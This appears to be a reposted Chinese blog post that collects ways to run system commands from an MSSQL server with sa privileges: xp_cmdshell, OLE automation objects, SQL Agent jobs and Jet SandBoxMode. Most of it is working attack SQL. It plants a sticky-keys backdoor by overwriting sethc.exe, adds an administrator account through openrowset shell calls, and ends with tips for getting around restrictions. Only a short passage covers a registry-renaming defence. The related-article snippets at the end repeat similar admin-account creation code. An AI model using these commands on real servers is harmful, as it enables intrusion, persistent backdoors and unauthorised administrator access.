sa执行命令方法总结

最新推荐文章于 2022-12-30 10:40:36 发布
最新推荐文章于 2022-12-30 10:40:36 发布
阅读量332 收藏
点赞数
文章标签: shell 操作系统 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33805992/article/details/85187088
版权

sa执行命令方法总结

转载请注明来源:BK瞬间群
测试环境:windows xp pro sp2 + mssql 2005(服务以system权限启动)
一.xp_cmdshell
EXEC master.. xp_cmdshell 'ipconfig'
开启xp_cmdshell:
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
二.sp_oacreate
创建wscript.shell对象
use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o, 'run',null, 'cmd /c "net user" > c:\test.tmp'
创建scripting.filesystemobject对象
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null, 'c:\windows\explorer.exe' , 'c:\windows\system32\sethc.exe';
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out                 exec sp_oamethod @oo, 'copyfile',null, 'c:\windows\system32\sethc.exe' , 'c:\windows\system32\dllcache\sethc.exe';
可以用utilman.exe代替sethc.exe达到同样的效果  后门很酷吗,呵呵
创建Shell.Application对象
declare @o int
exec sp_oacreate 'Shell.Application', @o out
exec sp_oamethod @o, 'ShellExecute',null, 'cmd.exe', 'cmd /c net user >c:\test.txt', 'c:\windows\system32', '',1;
开启OLE Automation Procedures
sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
sp_configure 'Ole Automation Procedures', 1;
GO
RECONFIGURE;
GO
我们的对策就是把对象做一下手脚
WScript.Shell可以调用系统内核运行DOS基本命令
可以通过修改注册表,将此组件改名,来防止危害。
HKEY_CLASSES_ROOT\WScript.Shell\
及HKEY_CLASSES_ROOT\WScript.Shell.1\
改名为其它的名字,如:改为WScript.Shell_ChangeName或WScript.Shell.1_ChangeName
自己以后调用的时候使用这个就可以正常调用此组件了
也要将clsid值也改一下
HKEY_CLASSES_ROOT\WScript.Shell\CLSID\项目的值
HKEY_CLASSES_ROOT\WScript.Shell.1\CLSID\项目的值
同wscript.shell理、scripting.filesystemobject、Shell.Application
三.JOB
利用JOB执行命令,有一个先决条件就是开启SQLSERVERAGENT服务,下面的语句可以开启
exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'
use msdb create table [jncsql](resulttxt nvarchar(1024) null) exec sp_delete_job null, 'x' exec sp_add_job 'x' exec
sp_add_jobstep null, 'x',null, '1', 'cmdexec', 'cmd /c "net user>c:\test.test"' exec sp_add_jobserver
null, 'x', @@servername exec sp_start_job 'x';
四.SandBoxMode(网上常说的沙盒模式)
原理:在access里调用VBS的shell函数,以system权限执行任何命令。但是试用这个函数之前必须把注册表里的一个叫SandBoxmode的开关打开,
注册表:HKEY_LOCAL_MACHINE\SoFtWare\Micris
oft\Jet\4.0\Engine\SandBoxmode.默认值为2,这个人键值为0表示始
终禁用SandBoxmode模式,1表示对于非Acess应用程序试用SandBoxmode模式,2表示对access应用程序使用SandBoxmode模式,3则表示完全开启安全设置。 //1或0都可以执行命令
EXEC sp_addlinkedserver 'testsql','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:\windows\system32\ias\ias.mdb'
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD',1
EXEC master..xp_regread  HKEY_LOCAL_MACHINE , 'Software\Microsoft\Jet\4.0\engines', 'SandBoxMode'
select * from openrowset( 'microsoft.jet.oledb.4.0', ';database=c:\windows\system32\ias\ias.mdb', 'select shell("cmd.exe /c net user test test /add")')
select * from openrowset( 'microsoft.jet.oledb.4.0',
';database=c:\windows\system32\ias\ias.mdb', 'select shell("cmd.exe /c net localgroup administrators test /add")')
下面是系统自带的两个mdb文件
C:\WINDOWS\system32\ias\dnary.mdb
C:\WINDOWS\system32\ias\ias.mdb
总结
   上述几种方法(仔细看看我都忘记有几种了,哈哈。你可以发散思维,再找出来几种)都是在默认情况下测试的,往往***的时候有很多限制条件,我们可以逐一克服,利用组件得到服务器信息,读取、创建文件了等等,我们还是要对 权限这个词组有深层次的理解啊。
附注
      关于*.exe  c:\windows\system32\ 还有c:\windows\system32\dllcache呢
      关于cmd.exe还有command.exe呢
      关于net.exe还有net1.exe呢
      Mdb文件不存在我们可以上传一个啊
      执行命令的组件不是只有一个哦
weixin_33805992
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【安全牛学习笔记】MSsql2005(Sa)权限执行命令总结
edu_aqniu的博客
10-31 689
​一.xp_cmdshell EXEC master..xp_cmdshell 'ipconfig' 开启xp_cmdshell: -- To allow advanced options to be changed. EXEC sp_configure 'show advanced options', 1 GO -- To update the current
Unix 命令全集
03-26
sa 命令 sa1 命令 sa2 命令 sact 命令 sadc 命令 sar 命令 savebase 命令 savecore 命令 savevg 命令 scan 命令 sccs 命令 sccsdiff 命令 sccshelp 命令 schedo 命令 schedtune 命令 scls 命令 script 命令 sdiff 命令 secldapclntd 守护进程 sectoldif 命令 securetcpip 命令 sed 命令 send 命令 sendbug 命令 sendmail 命令 setclock 命令 setgroups 命令 setmaps 命令 setsenv 命令 settime 命令 setuname 命令 sh 命令 shconf 命令 shell 命令 show 命令 showmount 命令 shutacct 命令 shutdown 命令 size 命令 skulker 命令 slattach 命令 sleep 命令 slibclean 命令 sliplogin 命令 slocal 命令 smcaprop 命令 smdefca 命令 smdemon.cleanu 命令 smexpcacert 命令 smgenkeycr 命令 smgenprivkr 命令 smimpcacert 命令 smimpservercert 命令 sminstkey 命令 smit 命令 smitty 命令 smlistcerts 命令 smserverprop 命令 smsigncert 命令 smundefca 命令 snap 命令 snapcore 命令 snapshot 命令 snmpevent 命令 snmpd 守护进程 snmpdv1 守护进程 snmpdv3 守护进程 snmpinfo 命令 snmpmibd 守护进程 snmptrap 命令 snmpv3_ssw 命令 sno 命令 soelim 命令 sort 命令 sortbib 命令 sortm 命令 spell 命令 spellin 命令 spellout 命令 split 命令 splat 命令 splitvg 命令 splitlvcopy 命令 splp 命令 spost 命令 spray 命令 sprayd 守护进程 srcmstr 守护进程 startcondresp 命令 start-secldapclntd 命令 stop-secldapclntd 命令 startrpdomain 命令 startrpnode 命令 startsrc 命令 startup 命令 startvsd 命令 startx 命令 statd 守护进程 statvsd 命令 stopcondresp 命令 stoprpdomain 命令 stoprpnode 命令 stopsrc 命令 stopvsd 命令 stpinet 方法 strace 命令 strchg 命令 strclean 命令 strconf 命令 strerr 守护进程 strinfo 命令 strings 命令 strip 命令 stripnm 命令 strload 命令 strreset 命令 struct 命令 sttinet 方法 stty 命令 stty-cxma 命令 style 命令 su 命令 subj 命令 sum 命令 survd 守护进程 suspendvsd 命令 svmon 命令 swap 命令 swapoff 命令 swapon 命令 swcons 命令 sync 命令 synclvodm 命令 syncvg 命令 syscall 命令 sysck 命令 syscorepath 命令 sysdumpdev 命令 sysdumpstart 命令 sysline 命令 syslogd 守护进程 tab 命令 tabs 命令 tail 命令 talk 命令 talkd 守护进程 tapechk 命令 tar 命令 tbl 命令 tc 命令 tcbck 命令 tcopy 命令 tcpdump 命令 tctl 命令 tee 命令 telinit 或 init 命令 telnet、tn 或 tn3270 命令 telnetd 守护进程 termdef 命令 test 命令 tftp 或 utftp 命令 tftpd 守护进程 tic 命令 time 命令 timed 守护进程 timedc 命令 timex 命令 tip 命令 tokstat 命令 topas 命令 topsvcs 命令 topsvcsctrl 命令 touch 命令 tprof 命令 tput 命令 tr 命令 trace 守护进程 traceroute 命令 tracesoff 命令 traceson 命令 trbsd 命令 trcdead 命令 trcevgrp 命令 trcnm 命令 trcrpt 命令 trcstop 命令 trcupdate 命令 troff 命令 trpt 命令 true 或 false 命令 truss 命令 tset 命令 tsh 命令 tsm 命令 tsort 命令 ttt 命令 tty 命令 tunchange 命令 tuncheck 命令 tundefault 命令 tunrestore 命令 tunsave 命令 turnacct 命令 turnoff 命令 turnon 命令 tvi 命令 twconvdict 命令 twconvfont 命令 type 命令 ucfgif 方法 ucfginet 方法 ucfgqos 方法 ucfgvsd 命令 uconvdef 命令 udefif 方法 udefinet 方法 udfcheck 命令 udfcreate 命令 udflabel 命令 uil 命令 uimx 命令 ul 命令 ulimit 命令 umask 命令 umount 或 unmount 命令 umountall 命令 unalias 命令 uname 命令 uncompress 命令 undefvsd 命令 unexpand 命令 unfencevsd 命令 unget 命令(SCCS) unifdef 命令 uninstallms 命令 uniq 命令 units 命令 unlink 命令 unloadipsec 命令 unmirrorvg 命令 unpack 命令 untab 命令 update 命令 updatevsdnode 命令 updatevsdtab 命令 updatevsdvg 命令 uprintfd 守护进程 uptime 命令 users 命令 usrck 命令 utmpd 守护进程 uucheck 命令 uucico 守护进程 uuclean 命令 uucleanup 命令 uucp 命令 uucpadm 命令 uucpd 守护进程 uudecode 命令 uudemon.admin 命令 uudemon.cleanu 命令 uudemon.hour 命令 uudemon.poll 命令 uuencode 命令 uuid_gen 命令(NCS) uukick 命令 uulog 命令 uuname 命令 uupick 命令 uupoll 命令 uuq 命令 uusched 守护进程 uusend 命令 uusnap 命令 uustat 命令 uuto 命令 uutry 命令 Uutry 命令 uux 命令 uuxqt 守护进程
河马mysql弱口令_网络安全渗透第8节课笔记
weixin_39884492的博客
01-20 366
提权:防护措施:在Windows中安装apache后,要单独为其创建一个账户,只给启动服务的权限,防止攻击者通过apache直接获得system权限,Linux同理。IIS中网站为什么使用匿名登录?任何windows服务都会对应一个账号来运行:Windows安装IIS后,在计算机管理---系统工具---本地用户和组---用户中都会有IUSER和IWAM两个用户,IUSER可以匿名访问内置账户。打开...
记一次艰难的sql提权。
weixin_30325793的博客
07-18 122
昨晚没关机 扫了一夜 扫到一个3389,而且开着1433,且1433的sa账户是空口令。 遂大喜。 第一步:尝试xp_cmdshell xp_cmdshell'dirc:/>>r.txt' 提示找不到xplog70.dll,于是我恢复一下xp_cmdshell试试 execsp_dropextendedproc'xp_cmdshell'dbccaddext...
服务器提权总结
mengzaifei6的专栏
04-24 1226
迅雷下载提权 Set vbs = CreateObject("Wscript.Shell") vbs.run "cmd /c net user book book /add",0 vbs.run "cmd /c net localgroup administrators book /add",0 PCAnywhere连接提权 跳转C:\Documents and Settin
MSsql2005(Sa)权限执行命令总结.txt
07-18
权限执行命令总结权限执行命令总结
SQL Server SA权限总结经典技术
09-14
如果我们在取得SA权限后远程使用Sqlexec执行cmd命令出现提示SQL_ERROR,那么很可能是去掉了xp_cmdshell。此时,我们可以使用两种方法来恢复xp_cmdshell方法一、使用SQL Query Analyzer连接对方后直接写入,使用...
关于SQL Server 2008忘记sa密码修改sa密码的方法图解
09-09
总结来说,当忘记`sa`密码时,可以通过更改服务器身份验证模式、修改`sa`密码并重启服务,或者使用T-SQL命令或创建新用户来恢复访问。在执行这些操作时,确保遵循安全最佳实践,例如定期更新密码,并避免在生产环境...
sa口令修改清除
07-01
- 使用具有足够权限的账户登录操作系统,然后运行以下命令: ```sql SQLCMD -S .\instancename -U sa -P '' ``` - 因为我们在单用户模式下,所以无需输入密码即可登录。 - 在SQLCMD环境中,输入以下命令重置`...
清除SA密码
01-17
`SA`(System Administrator)账户是SQL Server安装时默认创建的一个超级用户,它属于`sysadmin`固定服务器角色,具有执行所有操作的权限,包括创建和修改数据库、备份和恢复数据、设置服务器配置等。在早期版本的...
SQL 不常用的一些命令sp_OACreate,xp_cmdshell,sp_makewebtask
12-14
1. 开启和关毕xp_cmdshell EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE;– 开启xp_cmdshell EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 0;RECONFIGURE;– 关毕xp_cmdshell EXEC sp_configure ‘show advanced options
sql server远程执行cmd命令
08-18
这是用C#Winfrom写的一个小工具,利用sqlserver中的master数据库中的xp_cmdshell远程执行cmd命令。
《linux核心应用命令速查》连载三:sa:报告、清理并维护进程统计文件
weixin_33851429的博客
08-02 115
sa:报告、清理并维护进程统计文件 作用:sa命令把/var/log/pacct中的信息压缩到摘要文件/var/log/savacct和/var/log/usracct中,报告、清理并维护进程统计文件。 用法:sa [选项]... [文件]... 主要选项如下。 — -a:打印所有命令的名称(包括那些带有不可打印字符的)。 — -b:将输出按用户和系统时间的总和除以调用次数来进行分类。...
SA常用命令
weixin_30911451的博客
09-21 214
1.查看Apache的并发请求数及其TCP连接状态: Linux命令: netstat -n | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}' 返回结果示例:   LAST_ACK 5   SYN_RECV 30   ESTABLISHED 1597   FIN_WAIT1 51   FIN_WAIT2 504   TIME_WAI...
sa linux,sa执行命令方法总结
weixin_36378669的博客
05-25 662
转载请注明来源:BK瞬间群首发Web安全手册////////////////////////////////////////////////////////////////////////sa执行命令方法总结By 无敌小黄瓜////////////////////////////////////////////////////////////////////////测试环境:windows xp ...
mssql提权总结
st3pby的博客
12-30 2658
mssql提权总结
sar命令详解
热门推荐
weixin_67510296的博客
06-09 1万+
sar命令虽然功能强大,在很多方面方面我们都可以使用sar来查询到我们需要的数据,但不是说我们就需用sar就可以了,对于系统的监控优化命令,当然是越多越好,很多时候我还是习惯使用top、free这些命令,从来没有无敌的工具,真正厉害的是灵活运用工具的我们。...
使用sasar命令统计系统资源使用情况
weixin_34096182的博客
04-11 276
首先需要安装一个包 # rpm -qa sysstat sysstat-7.0.2-3.el5 这个包安装了一些很有用的文件 # rpm -ql sysstat /etc/cron.d/sysstat /etc/rc.d/init.d/sysstat /etc/sysconfig/sysstat /etc/sysconfig/sysstat.ioconf /...
三、实验内容 1. 使用man命令获得ls、uname、date、cal、mkdir、cp等Linux命令的帮助手册,了解这些命令的具体使用方法。同时,也可以通过执行“命令名 --help”来显示该命令的帮助信息,如“ls --help”,试用这些命令。 2. 通过uname命令的执行,查看并给出相关系统信息:操作系统的名称、系统域名、系统CPU名称等。 3. 用date命令显示当前的时间,用cal命令显示2008、2013年的日历,给出执行的命令和显示的结果。 4. 用ifconfig命令查看本机以太网卡的IP地址、子网掩码。实验总结
最新发布
05-25
执行命令“man ls”可以得到ls命令的帮助文档,其中包括了ls命令的使用方法、参数选项、常见用法等等。同样地,执行“man 命令名”可以得到其他命令的帮助文档。 执行“ls --help”可以显示ls命令的帮助信息,其中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值